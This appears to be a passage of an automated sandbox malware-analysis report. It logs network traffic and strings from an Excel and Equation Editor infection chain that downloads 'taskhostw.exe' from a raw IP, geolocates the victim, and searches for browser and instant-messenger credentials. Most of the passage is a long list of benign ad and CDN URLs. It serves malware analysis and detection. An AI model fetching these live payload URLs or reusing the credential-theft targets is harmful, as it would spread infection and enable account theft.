                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00222404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_00222404
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14B4F450.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /7al0eY HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: shuvi.ioConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /450/taskhostw.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: bhv35FF.tmp.13.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                Source: svchost.exe, 0000000D.00000002.468059953.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Is://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000D.00000002.468059953.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Is://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: svchost.exe, 0000000D.00000003.467860063.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000D.00000003.467860063.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhv35FF.tmp.13.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: shuvi.io
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 12 Oct 2024 14:39:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'cf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xO4ATnQxDN%2BDV0YZuunCA%2FhxvL2CaMYEb%2FbIsx9FPhUrgcadwm54XkljDBar%2FQAu8GSSK%2F3VzYN9Yk1FdWDx1PX%2FXAlrGtOQvJ5l7zaMYaeWvOAXNlxRYdcnsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d17d783e86a8c78-EWRalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 12 Oct 2024 14:39:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'cf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZpCVrwdCNlWEoQRZ%2FY3LEkoby9aATkpRrr7nvCgyBAOLz4X41VrKXClFhkBVvOS6B4XRkmw4TMhz9K5cAeOc%2FeouvVH3rgdKIP%2BamcwTOK37kHhHXGVLGFmWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d17d7885e8541ad-EWRalt-svc: h3=":443"; ma=86400
                Source: EQNEDT32.EXEString found in binary or memory: http://104.168.7.25/450/taskhostw.exe
                Source: EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.25/450/taskhostw.exedv
                Source: EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.25/450/taskhostw.exegu4
                Source: EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.25/450/taskhostw.exej
                Source: EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.25/450/taskhostw.exennC:
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                Source: svchost.exe, 0000000C.00000002.1055320689.0000000000764000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.473800760.0000000000762000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.462073851.0000000000764000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.461911100.0000000000764000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.536666079.0000000000764000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.473827149.0000000000764000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.461663215.0000000000759000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.461859039.0000000000764000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.461888956.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: name.exe, 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
                Source: svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
